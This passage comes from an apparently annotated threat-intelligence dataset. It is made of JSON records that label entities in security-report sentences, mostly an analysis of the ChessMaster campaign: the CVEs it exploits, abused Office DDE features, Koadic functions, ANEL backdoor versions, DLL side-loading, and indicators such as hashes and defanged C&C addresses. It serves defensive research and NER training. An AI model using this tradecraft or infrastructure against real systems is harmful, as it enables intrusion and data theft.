1.","entities":[{"id":49644,"label":"attack-pattern","start_offset":17,"end_offset":31},{"id":49645,"label":"attack-pattern","start_offset":50,"end_offset":65},{"id":49650,"label":"attack-pattern","start_offset":238,"end_offset":252},{"id":49647,"label":"attack-pattern","start_offset":101,"end_offset":157},{"id":49648,"label":"attack-pattern","start_offset":161,"end_offset":175},{"id":49649,"label":"vulnerability","start_offset":221,"end_offset":234},{"id":49651,"label":"vulnerability","start_offset":299,"end_offset":313},{"id":49652,"label":"attack-pattern","start_offset":271,"end_offset":286},{"id":49654,"label":"malware","start_offset":473,"end_offset":479},{"id":49655,"label":"malware","start_offset":528,"end_offset":534},{"id":49656,"label":"malware","start_offset":538,"end_offset":542},{"id":49657,"label":"malware","start_offset":546,"end_offset":550},{"id":49653,"label":"malware","start_offset":427,"end_offset":433}],"relations":[],"Comments":[]} {"id":3795,"text":"Infection Chain for the current ChessMaster campaign","entities":[{"id":49658,"label":"malware","start_offset":32,"end_offset":43}],"relations":[],"Comments":[]} {"id":3796,"text":"ChessMaster’s current iteration starts off with the familiar phishing attacks seen in the earlier campaigns that involved the use of an email with an attached malicious document using the doc, docx, rtf, csv and msg formats.","entities":[{"id":49659,"label":"malware","start_offset":0,"end_offset":11},{"id":49660,"label":"attack-pattern","start_offset":61,"end_offset":77}],"relations":[],"Comments":[]} {"id":3797,"text":"The email title and attached file name were written in Japanese and contain general business, political, and economy-themed phrases such as 世界経済(World economy) 経済政策(economic policy) 予算概算要求(budget estimation request) 日米対話(Japan-US dialogue) 安倍再任(re-appointment of Prime Minister Abe) 連絡網(contact network) 職員採用案(staff recruitment plan) 会議(meeting) However, there is a change in the exploit document.","entities":[],"relations":[],"Comments":[]} {"id":3798,"text":"When we tracked ChessMaster back in November, we noted that it exploited the SOAP WSDL parser vulnerability CVE-2017-8759 (patched in September 2017) within the Microsoft .NET framework to download additional malware.","entities":[{"id":49661,"label":"malware","start_offset":16,"end_offset":27},{"id":49664,"label":"TIME","start_offset":134,"end_offset":148},{"id":49666,"label":"vulnerability","start_offset":77,"end_offset":121},{"id":49662,"label":"TIME","start_offset":36,"end_offset":44},{"id":49667,"label":"SOFTWARE","start_offset":161,"end_offset":185}],"relations":[{"id":854,"from_id":49661,"to_id":49666,"type":"exploits"},{"id":855,"from_id":49667,"to_id":49666,"type":"has"}],"Comments":[]} {"id":3799,"text":"While ChessMaster still uses the previous exploit, it also added more methods to its arsenal: one exploits another vulnerability, CVE-2017-11882 (patched in November 2017), which was also exploited to deliver illegal versions of the Loki infostealer.","entities":[{"id":49668,"label":"malware","start_offset":233,"end_offset":249},{"id":49669,"label":"TIME","start_offset":157,"end_offset":170},{"id":49670,"label":"vulnerability","start_offset":130,"end_offset":144},{"id":49671,"label":"malware","start_offset":6,"end_offset":17}],"relations":[{"id":856,"from_id":49671,"to_id":49670,"type":"exploits"},{"id":857,"from_id":49670,"to_id":49668,"type":"drops"}],"Comments":[]} {"id":3800,"text":"Figure 2. Exploitation of CVE-2017-11882","entities":[{"id":49672,"label":"vulnerability","start_offset":26,"end_offset":40}],"relations":[],"Comments":[]} {"id":3801,"text":"It also abuses three legitimate MS Office functions:","entities":[{"id":49673,"label":"SOFTWARE","start_offset":32,"end_offset":41}],"relations":[],"Comments":[]} {"id":3802,"text":"Function Purpose Affected MS Office Formats we found in the wild Automatic Dynamic Data Exchange (DDEAUTO) A legitimate Microsoft Office function used in an Office file to retrieve data from another Office file","entities":[{"id":49675,"label":"SOFTWARE","start_offset":120,"end_offset":136},{"id":49674,"label":"SOFTWARE","start_offset":26,"end_offset":35},{"id":49677,"label":"SOFTWARE","start_offset":199,"end_offset":205},{"id":49676,"label":"SOFTWARE","start_offset":157,"end_offset":163}],"relations":[],"Comments":[]} {"id":3803,"text":".doc .rtf .msg Link","entities":[],"relations":[],"Comments":[]} {"id":3804,"text":"Auto Update","entities":[],"relations":[],"Comments":[]} {"id":3805,"text":"An Office function used for automatic and user-free updates for embedded links upon opening.","entities":[{"id":49678,"label":"SOFTWARE","start_offset":3,"end_offset":9}],"relations":[],"Comments":[]} {"id":3806,"text":" .csv Microsoft Word's \"Frames\/Frameset\" A feature that allows HTML or Text pages to be loaded in a frame within Microsoft Word.","entities":[{"id":49679,"label":"SOFTWARE","start_offset":8,"end_offset":22},{"id":49680,"label":"SOFTWARE","start_offset":115,"end_offset":129}],"relations":[],"Comments":[]} {"id":3807,"text":" .docx Figure 3. Exploitation of DDEAUTO Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":3808,"text":"Abusing Microsoft Word's \"Frames\/Frameset\"","entities":[{"id":49681,"label":"SOFTWARE","start_offset":8,"end_offset":22}],"relations":[],"Comments":[]} {"id":3809,"text":" Figure 5. Exploitation of Link Auto Update","entities":[],"relations":[],"Comments":[]} {"id":3810,"text":"ChessMaster can utilize any of these methods to download the next malware in the chain, the open source post-exploitation tool known as “Koadic,” which the previous campaign also used.","entities":[{"id":49682,"label":"malware","start_offset":0,"end_offset":11},{"id":49683,"label":"malware","start_offset":137,"end_offset":143}],"relations":[{"id":858,"from_id":49682,"to_id":49683,"type":"downloads"}],"Comments":[]} {"id":3811,"text":"This tool is responsible for stealing information — specifically the environment information — within the target system.","entities":[],"relations":[],"Comments":[]} {"id":3812,"text":"Koadic executes the following command: %comspec% \/q \/c 1> 2>&1 ","entities":[{"id":49684,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":3813,"text":"The commands and output of Koadic will change according to the ANEL version used in the attack.","entities":[{"id":49686,"label":"malware","start_offset":27,"end_offset":33},{"id":49685,"label":"malware","start_offset":63,"end_offset":67}],"relations":[],"Comments":[]} {"id":3814,"text":"The table below lists examples of the commands and outputs for ANEL versions 5.1.1 rc and 5.1.2 rc1.","entities":[{"id":49687,"label":"malware","start_offset":63,"end_offset":67}],"relations":[],"Comments":[]} {"id":3815,"text":"Note that if ANEL 5.1.2 rc1 was downloaded, the attacker would use HTTPS to avoid the downloaded data being captured as clear text.","entities":[{"id":11587,"label":"malware","start_offset":13,"end_offset":17}],"relations":[],"Comments":[]} {"id":3816,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":3817,"text":"Koadic commands and output when ANEL 5.1.1 rc is used Figure 7.","entities":[{"id":11590,"label":"malware","start_offset":0,"end_offset":6},{"id":11592,"label":"malware","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} {"id":3818,"text":"Koadic commands and output when ANEL 5.1.2 rc1 is used","entities":[{"id":11594,"label":"malware","start_offset":0,"end_offset":6},{"id":11596,"label":"malware","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} {"id":3819,"text":"The table below lists all of Koadic's functions: {Variable}.user User-related functions {Variable}.user.isElevated Check Privilege {Variable}.user.OS Get OS Version {Variable}.user.DC","entities":[{"id":11597,"label":"malware","start_offset":29,"end_offset":35}],"relations":[],"Comments":[]} {"id":3820,"text":"Get DCName from Registry {Variable}.user.Arch","entities":[],"relations":[],"Comments":[]} {"id":3821,"text":"Get Architecture {Variable}.user.info Get User Information {Variable}.work","entities":[],"relations":[],"Comments":[]} {"id":3822,"text":"Main Routine functions {Variable}.work.report Reports to server {Variable}.work.error Returns error {Variable}.work.make_url Alters\/Modifies URL (C&C) {Variable}.work.get","entities":[],"relations":[],"Comments":[]} {"id":3823,"text":"Get the return of POST Header {Variable}.work.fork Creates rundll32.exe process {Variable}.http HTTP Connection functions {Variable}.http.create Creates initial HTTP objects {Variable}.http.post POST header {Variable}.http.addHeaders","entities":[],"relations":[],"Comments":[]} {"id":3824,"text":"Adds HTTP Headers {Variable}.http.get GET Header {Variable}.http.upload Uploads binaries\/data {Variable}.http.bin2str String manipulation {Variable}.http.downloadEx","entities":[],"relations":[],"Comments":[]} {"id":3825,"text":"Downloads response {Variable}.http.download Additional download function {Variable}.process Process-related functions {Variable}.process.currentPID Get Current Process ID {Variable}.process.list Enumerates Process {Variable}.process.kill Terminates Process {Variable}.registry Registry-related functions {Variable}.registry.HKCR Set HKEY_CLASSES_ROOT {","entities":[],"relations":[],"Comments":[]} {"id":3826,"text":"Variable}.registry.HKCU Set HKEY_CURRENT_USER {Variable}.registry.HKLM Set HKEY_LOCAL_MACHINE {Variable}.registry.STRING Set String Value {Variable}.registry.BINARY Set Binary Value {Variable}.registry.DWORD Set DWORD Value {Variable}.registry.QWORD","entities":[],"relations":[],"Comments":[]} {"id":3827,"text":"Set QWORD Value {Variable}.registry.write Write\/Add Registry {Variable}.registry.provider Create Registry Handle {Variable}.registry.destroy Deletes Registry Key {Variable}.registry.read Get\/Read Registry Entries {Variable}.WMI WMI-related functions {","entities":[],"relations":[],"Comments":[]} {"id":3828,"text":"Variable}.WMI.createProcess Creates specified process {Variable}.shell File\/Process Execution functions {Variable}.shell.run Run commands {Variable}.shell.exec Executes process {Variable}.file File-related functions {Variable}.file.getPath Get specified file path {Variable}.file.readText Reads specified text file {Variable}.file.get32BitFolder Get System Folder (32\/64-bit) {Variable}.file.writol Writes on specified file {Variable}.file.deleteFile Deletes specified file {Variable}.file.readBinary Reads specified binary file. Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":3829,"text":"Command added when the Koadic RAT is downloaded (use of {Variable}.shell.exec command)","entities":[{"id":11613,"label":"malware","start_offset":23,"end_offset":29}],"relations":[],"Comments":[]} {"id":3830,"text":"If Koadic finds that the system is conducive to the attacker’s interests, it downloads a base64-encrypted version of the ANEL malware from the Command-and-Control (C&C) server and executes it. Encrypted ANEL is decrypted using the “certutil -docode” command.","entities":[{"id":11615,"label":"malware","start_offset":121,"end_offset":125},{"id":11618,"label":"malware","start_offset":204,"end_offset":208},{"id":49688,"label":"malware","start_offset":3,"end_offset":9}],"relations":[{"id":859,"from_id":49688,"to_id":11615,"type":"downloads"}],"Comments":[]} {"id":3831,"text":"When ANEL executes, a decrypted DLL file with the filename “lena_http_dll.dll” is expanded in memory.","entities":[{"id":11620,"label":"malware","start_offset":5,"end_offset":9},{"id":11621,"label":"FILEPATH","start_offset":60,"end_offset":77}],"relations":[],"Comments":[]} {"id":3832,"text":"This file contains one export function — either “crt_main” or “lena_main” Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":3833,"text":"Base64 encoded ANEL downloaded by Koadic ANEL will send the infected environment’s information to the C&C server.","entities":[{"id":49689,"label":"malware","start_offset":15,"end_offset":19},{"id":49690,"label":"malware","start_offset":34,"end_offset":40},{"id":49691,"label":"malware","start_offset":41,"end_offset":45},{"id":49692,"label":"Infrastucture","start_offset":102,"end_offset":112}],"relations":[{"id":860,"from_id":49690,"to_id":49689,"type":"downloads"},{"id":861,"from_id":49691,"to_id":49692,"type":"exfiltrates-to"}],"Comments":[]} {"id":3834,"text":"When sending the information, ANEL encrypts the data using blowfish, XOR, and Base64-based encryption methods.","entities":[{"id":11628,"label":"malware","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} {"id":3835,"text":"The format ANEL uses to send data is similar to ChChes, but ANEL's encryption method is easier to use.","entities":[{"id":11630,"label":"malware","start_offset":11,"end_offset":15},{"id":11631,"label":"malware","start_offset":48,"end_offset":54},{"id":11632,"label":"malware","start_offset":60,"end_offset":64}],"relations":[],"Comments":[]} {"id":3836,"text":"Figure 10.","entities":[],"relations":[],"Comments":[]} {"id":3837,"text":"Encryption key using blowfish","entities":[],"relations":[],"Comments":[]} {"id":3838,"text":"We initially discovered the malware known as ANEL back in September 2017.","entities":[{"id":11634,"label":"malware","start_offset":45,"end_offset":49},{"id":49693,"label":"TIME","start_offset":58,"end_offset":72}],"relations":[],"Comments":[]} {"id":3839,"text":"At that time, ChessMaster was using ANEL as a backdoor into the target system then injects code into svchost.exe, which then decrypts and activates the embedded backdoor.","entities":[{"id":49694,"label":"malware","start_offset":14,"end_offset":25},{"id":49695,"label":"malware","start_offset":36,"end_offset":40},{"id":49696,"label":"FILEPATH","start_offset":101,"end_offset":112}],"relations":[],"Comments":[]} {"id":3840,"text":"This initial version of ANEL had a hardcoded version labeled “5.0.0 beta1” that contained incomplete code.","entities":[{"id":11641,"label":"malware","start_offset":24,"end_offset":28}],"relations":[],"Comments":[]} {"id":3841,"text":"We noted that this might signify the release of a future variant.","entities":[],"relations":[],"Comments":[]} {"id":3842,"text":"Instead of just one new variant, we discovered four different versions of ANEL: 5.0.0 beta1 5.1.1 rc 5.1.2 rc1 5.2.0 rev1 The different versions contain changes in the ANEL loader and the main ANEL DLL.","entities":[{"id":11645,"label":"malware","start_offset":74,"end_offset":78},{"id":11648,"label":"malware","start_offset":195,"end_offset":199},{"id":11646,"label":"malware","start_offset":170,"end_offset":174}],"relations":[],"Comments":[]} {"id":3843,"text":"The figure below shows a summary of the changes between each version: Figure 11.","entities":[],"relations":[],"Comments":[]} {"id":3844,"text":"Summary of the changes between each version of ANEL","entities":[{"id":49697,"label":"malware","start_offset":47,"end_offset":51}],"relations":[],"Comments":[]} {"id":3845,"text":"Differences with regards to Backdoor commands: CMD ID 5.0.0 beta1\/5.1.1 rc\/5.1.2 rc1 5.2.0 rev1 0x97A168D9697D40DD Save File 0x7CF812296CCC68D5 Upload File 0x652CB1CEFF1C0A00 NA Load New PE file 0x27595F1F74B55278 Save File and Execute If no match above Execute Command or File The differences shown in the table above are subtle but present.","entities":[],"relations":[],"Comments":[]} {"id":3846,"text":"For example, the initial ANEL version, “5.0.0 beta1,” uses a different C&C server compared to the other versions.","entities":[{"id":11660,"label":"malware","start_offset":25,"end_offset":29}],"relations":[],"Comments":[]} {"id":3847,"text":"Once ANEL evolved to “5.1.1 rc,” it changed its file type to an executable, while also changing the C&C server.","entities":[{"id":11661,"label":"malware","start_offset":5,"end_offset":9}],"relations":[],"Comments":[]} {"id":3848,"text":"The third version we found (5.1.2 rc1) reverts to a DLL file type but retains the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":3849,"text":"The fourth version of ANEL (5.2.0 rev1) changes both the export function in the expanded main ANEL DLL and uses a different C&C server.","entities":[{"id":49698,"label":"malware","start_offset":22,"end_offset":39}],"relations":[],"Comments":[]} {"id":3850,"text":"Overall, we can see subtle changes, which indicate that the threat actors behind ANEL are making incremental improvements to the malware to refine it.","entities":[{"id":49699,"label":"malware","start_offset":81,"end_offset":85}],"relations":[],"Comments":[]} {"id":3851,"text":"Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":3852,"text":"Backdoor function differences between ANEL 5.0.0 beta1\/5.1.1 rc\/5.1.2 rc1 (left) and ANEL 5.2.0 rev1 (right)","entities":[{"id":49700,"label":"malware","start_offset":38,"end_offset":73},{"id":49701,"label":"malware","start_offset":85,"end_offset":100}],"relations":[],"Comments":[]} {"id":3853,"text":"Once ANEL enters the user’s system, it will download various tools that could be used for malicious purposes, including password retrieval tools as well as malicious mail services and accessibility tools that will allow it to gather information about the system.","entities":[{"id":49702,"label":"malware","start_offset":5,"end_offset":9}],"relations":[],"Comments":[]} {"id":3854,"text":"These include Getpass.exe and Mail.exe, which are password and information stealers.","entities":[{"id":49703,"label":"FILEPATH","start_offset":14,"end_offset":25},{"id":49704,"label":"FILEPATH","start_offset":30,"end_offset":38}],"relations":[],"Comments":[]} {"id":3855,"text":"It also downloads the following: Accevent.exe <-> Microsoft Accessible Event Watcher 7.2.0.0 event.dll <-> the loader of ssssss.ddd, (Detected as TROJ_ANELLDR) ssssss.ddd (lena_http.bin) <-> encrypted BKDR_ANEL (Detected as BKDR_ANELENC) ","entities":[{"id":49708,"label":"FILEPATH","start_offset":161,"end_offset":171},{"id":49711,"label":"malware","start_offset":225,"end_offset":237},{"id":49705,"label":"FILEPATH","start_offset":34,"end_offset":46},{"id":49706,"label":"FILEPATH","start_offset":94,"end_offset":103},{"id":49707,"label":"FILEPATH","start_offset":122,"end_offset":132},{"id":49709,"label":"FILEPATH","start_offset":173,"end_offset":186},{"id":49710,"label":"malware","start_offset":202,"end_offset":211},{"id":49712,"label":"malware","start_offset":147,"end_offset":159},{"id":49713,"label":"SOFTWARE","start_offset":51,"end_offset":93}],"relations":[],"Comments":[]} {"id":3856,"text":"These three files work together using a common technique call DLL Side-Loading or DLL Hijacking.","entities":[{"id":49714,"label":"attack-pattern","start_offset":62,"end_offset":78},{"id":49715,"label":"attack-pattern","start_offset":82,"end_offset":95}],"relations":[],"Comments":[]} {"id":3857,"text":"In this scenario, accevent.exe is the primary executable, which is usually legitimate.","entities":[{"id":49716,"label":"FILEPATH","start_offset":18,"end_offset":30}],"relations":[],"Comments":[]} {"id":3858,"text":"After the execution of accevent.exe, it loads event.dll, which will be placed in the same folder (so it takes loading priority), after which event.dll decrypts and loads the encrypted backdoor ssssss.ddd, which is BKDR_ANEL.","entities":[{"id":49719,"label":"FILEPATH","start_offset":141,"end_offset":150},{"id":49717,"label":"FILEPATH","start_offset":23,"end_offset":35},{"id":49718,"label":"FILEPATH","start_offset":46,"end_offset":55},{"id":49720,"label":"FILEPATH","start_offset":193,"end_offset":203},{"id":49721,"label":"malware","start_offset":214,"end_offset":223}],"relations":[{"id":862,"from_id":49717,"to_id":49718,"type":"downloads"},{"id":863,"from_id":49720,"to_id":49721,"type":"duplicate-of"}],"Comments":[]} {"id":3859,"text":"When we analyzed ANEL 5.1.1 rc, encrypted ANEL 5.1.2 rc1 was downloaded and executed.","entities":[{"id":49722,"label":"malware","start_offset":17,"end_offset":30},{"id":49723,"label":"malware","start_offset":42,"end_offset":56}],"relations":[],"Comments":[]} {"id":3860,"text":"Short-term mitigation","entities":[],"relations":[],"Comments":[]} {"id":3861,"text":"When the user opens the document DDEAUTO or Link Auto Update, Office will display a message.","entities":[{"id":49724,"label":"SOFTWARE","start_offset":62,"end_offset":68}],"relations":[],"Comments":[]} {"id":3862,"text":"If the user clicks on the “No” button, malicious activity will not initiate.","entities":[],"relations":[],"Comments":[]} {"id":3863,"text":"Figure 13: Popup message when users open the document that abuses DDEAUTO Figure 14.","entities":[],"relations":[],"Comments":[]} {"id":3864,"text":"Popup message when the user opens the document that abuses Link Auto Update Koadic sends its own JavaScript code as plain text.","entities":[{"id":49725,"label":"malware","start_offset":76,"end_offset":82}],"relations":[],"Comments":[]} {"id":3865,"text":"The suspect communication allows us to detect the traffic.","entities":[],"relations":[],"Comments":[]} {"id":3866,"text":" Figure 15. Koadic’s communication traffic Medium- to long-term mitigation","entities":[{"id":49726,"label":"malware","start_offset":12,"end_offset":18}],"relations":[],"Comments":[]} {"id":3867,"text":"At first glance, it seems ChessMaster’s evolution over the past few months involves subtle changes.","entities":[{"id":49727,"label":"malware","start_offset":26,"end_offset":37}],"relations":[],"Comments":[]} {"id":3868,"text":"However, the constant addition and changing of features and attack vectors indicate that the attackers behind the campaign are unlikely to stop and are constantly looking to evolve their tools and tactics.","entities":[],"relations":[],"Comments":[]} {"id":3869,"text":" Organizations can implement various techniques and best practices to defend against targeted attacks, such as regular patching to prevent vulnerability exploitation and using tools that provide protection across different network levels.","entities":[],"relations":[],"Comments":[]} {"id":3870,"text":"Solutions that feature behavior monitoring, application control, email gateway monitoring, and intrusion\/detection systems can help with this.","entities":[],"relations":[],"Comments":[]} {"id":3871,"text":"Given how cybercriminal tools, tactics and procedures are evolving, organizations will have to go beyond their typical day-to-day security requirements and find a way to preempt attacks.","entities":[],"relations":[],"Comments":[]} {"id":3872,"text":"Thus, there is a pressing need to detect and address threats via a proactive incident response strategy.","entities":[],"relations":[],"Comments":[]} {"id":3873,"text":"Essentially, this involves creating a remediation plan for effectively combating the threat and using round-the-clock intrusion detection and threat analysis to prevent attacks from entering the system.","entities":[],"relations":[],"Comments":[]} {"id":3874,"text":"A proactive strategy can be much more effective for targeted attacks, as these kinds of attacks are often designed to be elusive and difficult to detect, thus the need to scope them out.","entities":[],"relations":[],"Comments":[]} {"id":3875,"text":"A comprehensive security strategy that involves proactive incident response will need the input of both decision makers and tech-savvy personnel, as they will need to be on the same page for it to be effective.","entities":[],"relations":[],"Comments":[]} {"id":3876,"text":"In addition to implementing both mitigation techniques and proactive strategies, organizations can also strengthen their security by employing solutions such Trend Micro™ Deep Security™ and TippingPoint, which protects endpoints from threats that abuse vulnerabilities.","entities":[{"id":49728,"label":"identity","start_offset":158,"end_offset":169},{"id":49729,"label":"SOFTWARE","start_offset":171,"end_offset":184},{"id":49730,"label":"SOFTWARE","start_offset":190,"end_offset":202}],"relations":[],"Comments":[]} {"id":3877,"text":"In addition, comprehensive security solutions can be used to protect organizations from attacks.","entities":[],"relations":[],"Comments":[]} {"id":3878,"text":"These include Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security, which can protect users and businesses from these threats by detecting malicious files, well as blocking all related malicious URLs.","entities":[{"id":49731,"label":"identity","start_offset":14,"end_offset":25},{"id":49732,"label":"identity","start_offset":53,"end_offset":64},{"id":49733,"label":"SOFTWARE","start_offset":66,"end_offset":89},{"id":49734,"label":"SOFTWARE","start_offset":94,"end_offset":104},{"id":49735,"label":"SOFTWARE","start_offset":106,"end_offset":123}],"relations":[],"Comments":[]} {"id":3879,"text":"Trend Micro Deep Discovery™ can protect enterprises by detecting malicious attachment and URLs.","entities":[{"id":49736,"label":"SOFTWARE","start_offset":0,"end_offset":26}],"relations":[],"Comments":[]} {"id":3880,"text":"Trend Micro OfficeScan™ with XGen™ endpoint security","entities":[{"id":49737,"label":"SOFTWARE","start_offset":0,"end_offset":34}],"relations":[],"Comments":[]} {"id":3881,"text":"infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against all kinds of threats.","entities":[],"relations":[],"Comments":[]} {"id":3882,"text":"A more detailed analysis of the Command-and-Control communication flow of ANEL can be found in this technical brief.","entities":[{"id":49738,"label":"malware","start_offset":74,"end_offset":78}],"relations":[],"Comments":[]} {"id":3883,"text":"Indicators of Compromise Hash Downloader used in the campaign: 76b1f75ee15273d1226392db3d8f1b2aed467c2875e11d9c14fd18120afc223a 4edcff56f586bd69585e0c9d1d7ff4bfb1a2dac6e2a9588f155015ececbe1275 1b5a1751960b2c08631601b07e3294e4c84dfd71896453b65a45e4396a6377cc Hashes detected as part of the BKDR_ANEL Family: 5.0.0 beta1 af1b2cd8580650d826f48ad824deef3749a7db6fde1c7e1dc115c6b0a7dfa0dd 5.1.1 rc 2371f5b63b1e44ca52ce8140840f3a8b01b7e3002f0a7f0d61aecf539566e6a1 5.1.2 rc1 05dd407018bd316090adaea0855bd7f7c72d9ce4380dd4bc0feadc6566a36170 5.2.0 rev1 00030ec8cce1f21120ebf5b90ec408b59166bbc3fba17ebae0fc23b3ca27bf4f lena_http.bin 303f9c00edb4c6082542e456a30a2446a259b8bb9fb6b0f76ff318d5905e429c Tools used in the campaign: Getpass.exe 52a8557c8cdd5d925453383934cb10a85b117522b95c6d28ca097632ac8bc10d event.dll 6c3224dbf6bbabe058b0ab46233c9d35c970aa83e8c4bdffb85d78e31159d489 mail.exe 2f76c9242d5ad2b1f941fb47c94c80c1ce647df4d2d37ca2351864286b0bb3d8 URLs and IP Addresses related to the campaign: www[.]nasnnones[.]com trems[.]rvenee[.]com contacts[.]rvenee[.]com 91[.]207[.]7[.]91 89[.]18[.]27[.]159 89[.]37[.]226[.]108 185[.]25[.]51[.]116 185[.]81[.]113[.]95 185[.]144[.]83[.]82 185[.]153[.]198[.]58 185[.]159[.]129[.]226 Tags Malware | APT & Targeted Attacks | Endpoints | Cyber Crime | Research | Network","entities":[{"id":11786,"label":"SHA2","start_offset":194,"end_offset":258},{"id":11787,"label":"SHA2","start_offset":322,"end_offset":386},{"id":11788,"label":"SHA2","start_offset":398,"end_offset":462},{"id":11790,"label":"SHA2","start_offset":553,"end_offset":617},{"id":11792,"label":"SHA2","start_offset":634,"end_offset":698},{"id":11795,"label":"SHA2","start_offset":818,"end_offset":882},{"id":11799,"label":"IPV4","start_offset":1075,"end_offset":1092},{"id":11800,"label":"IPV4","start_offset":1093,"end_offset":1111},{"id":11801,"label":"IPV4","start_offset":1112,"end_offset":1131},{"id":11802,"label":"IPV4","start_offset":1132,"end_offset":1151},{"id":11803,"label":"IPV4","start_offset":1152,"end_offset":1171},{"id":11804,"label":"IPV4","start_offset":1172,"end_offset":1191},{"id":11805,"label":"IPV4","start_offset":1192,"end_offset":1212},{"id":11806,"label":"IPV4","start_offset":1213,"end_offset":1234},{"id":11784,"label":"SHA2","start_offset":64,"end_offset":128},{"id":11785,"label":"SHA2","start_offset":129,"end_offset":193},{"id":11789,"label":"SHA2","start_offset":475,"end_offset":539},{"id":11794,"label":"SHA2","start_offset":741,"end_offset":805},{"id":11796,"label":"SHA2","start_offset":894,"end_offset":958},{"id":11791,"label":"FILEPATH","start_offset":619,"end_offset":632},{"id":49741,"label":"DOMAIN","start_offset":1051,"end_offset":1074},{"id":49742,"label":"FILEPATH","start_offset":807,"end_offset":816},{"id":49743,"label":"FILEPATH","start_offset":884,"end_offset":892},{"id":49739,"label":"DOMAIN","start_offset":1008,"end_offset":1029},{"id":49740,"label":"DOMAIN","start_offset":1030,"end_offset":1050}],"relations":[],"Comments":[]} {"id":3884,"text":"Last June 9, 2021, the Cybersecurity and Infrastructure Security Agency (CISA) released the Rising Ransomware Threat to OT Assets, which addresses the recent rise in ransomware attacks targeting operational assets (OT) and control systems.","entities":[{"id":49744,"label":"TIME","start_offset":5,"end_offset":17},{"id":49745,"label":"identity","start_offset":23,"end_offset":78}],"relations":[],"Comments":[]} {"id":3885,"text":"The guidance provides steps to prepare for, mitigate against, and respond to attacks.","entities":[],"relations":[],"Comments":[]} {"id":3886,"text":"It also identifies how dependencies between an enterprise's IT and OT systems can give attackers a path.","entities":[],"relations":[],"Comments":[]} {"id":3887,"text":"Lastly, the document thoroughly explains how to decrease the risk of severe business degradation if affected by a ransomware attack.","entities":[],"relations":[],"Comments":[]} {"id":3888,"text":"To prepare for ransomware attacks, CISA recommends enterprises determine their critical operational processes' reliance on key IT infrastructure and identify a resilience plan for when access control is lost.","entities":[{"id":49746,"label":"identity","start_offset":35,"end_offset":39}],"relations":[],"Comments":[]} {"id":3889,"text":"They should also exercise an incident response plan and Implement regular data backup procedures on both IT and OT networks.","entities":[],"relations":[],"Comments":[]} {"id":3890,"text":"For mitigating and responding to an attack, organizations must practice good cyber hygiene by updating software, implementing an allow listing, and enabling strong spam filters.","entities":[],"relations":[],"Comments":[]} {"id":3891,"text":"Organizations must also identify which systems were affected and immediately isolate them and triage the impacted systems for restorations and recovery.","entities":[],"relations":[],"Comments":[]} {"id":3892,"text":"They must also confer with teams to develop and document what has occurred.","entities":[],"relations":[],"Comments":[]} {"id":3893,"text":"According to the agency, critical infrastructure owners and operators should also adopt an \"heightened state of awareness\".","entities":[],"relations":[],"Comments":[]} {"id":3894,"text":"CISA also encourages them to identify critical processes that must not be interrupted to provide essential services, develop and regularly test workarounds and\/or manual controls that ensure critical processes and industrial control system (ICS) network supporting them.","entities":[{"id":49747,"label":"identity","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} {"id":3895,"text":"CISA recommends critical infrastructure owners to implement robust network segmentation between IT and OT networks and make sure backup procedures are executed and tested regularly.","entities":[{"id":49748,"label":"identity","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} {"id":3896,"text":"Lastly, backups should be isolated from network connections.","entities":[],"relations":[],"Comments":[]} {"id":3897,"text":"The fact sheet comes after numerous ransomware attacks on key critical infrastructures in the US and abroad, including the attack on Colonial Pipeline by DarkSide.","entities":[{"id":49749,"label":"location","start_offset":94,"end_offset":96},{"id":49751,"label":"threat-actor","start_offset":154,"end_offset":162},{"id":49750,"label":"identity","start_offset":133,"end_offset":150}],"relations":[{"id":864,"from_id":49751,"to_id":49750,"type":"targets"}],"Comments":[]} {"id":3898,"text":"In 2019, Trend Micro conducted research analyzing cyberattacks by building and using a factory honeypot, mimicking a factory environment.","entities":[{"id":49752,"label":"TIME","start_offset":3,"end_offset":7},{"id":49753,"label":"identity","start_offset":9,"end_offset":20}],"relations":[],"Comments":[]} {"id":3899,"text":"The study, Fake Company, Real Threats, revealed that over 20 attacks were observed during 240 days- six of which affected factory productivity.","entities":[],"relations":[],"Comments":[]} {"id":3900,"text":"This shows how vulnerable smart factories are when it comes to various cyberattacks, such as ransomware.","entities":[],"relations":[],"Comments":[]} {"id":3901,"text":"Ransomware incidents are federal crimes, according to the agency.","entities":[],"relations":[],"Comments":[]} {"id":3902,"text":"Enterprises, especially critical infrastructure establishments, must report the attack to law enforcement to help bring the attackers to justice.","entities":[],"relations":[],"Comments":[]} {"id":3903,"text":"Moreover, decision-makers and stakeholders should have a better understanding of cybersecurity and its role in securing their operations and the safety of consumers.","entities":[],"relations":[],"Comments":[]} {"id":3904,"text":"To learn more about how to protect smart factories and their critical operations, read Trend Micro's expertly crafted best practices and solutions: Smart Factory Security Solutions Trend Micro Best Practices for Securing Smart Factories Tags Latest News | ICS OT | APT & Targeted Attacks | Ransomware | Articles, News, Reports | Cyber Threats","entities":[{"id":49754,"label":"identity","start_offset":87,"end_offset":98}],"relations":[],"Comments":[]} {"id":3905,"text":"Web shells, in their simplicity and straightforwardness, are highly potent when it comes to compromising systems and environments.","entities":[],"relations":[],"Comments":[]} {"id":3906,"text":"These malicious code pieces can be written in ASP, PHP, and JSP, or any script that can execute a system command with a parameter that can pass through the web.","entities":[],"relations":[],"Comments":[]} {"id":3907,"text":"Web shells can be embedded on web servers and can be used by malicious actors to launch arbitrary code.","entities":[{"id":49755,"label":"attack-pattern","start_offset":81,"end_offset":102},{"id":49756,"label":"attack-pattern","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":3908,"text":"In as little as 15 bytes, web shells can enable remote administration of an infected machine or system.","entities":[{"id":49757,"label":"attack-pattern","start_offset":26,"end_offset":36}],"relations":[],"Comments":[]} {"id":3909,"text":"Threats such as this can be difficult to detect even with multiple security layers — especially if they are not consolidated. In this blog, we 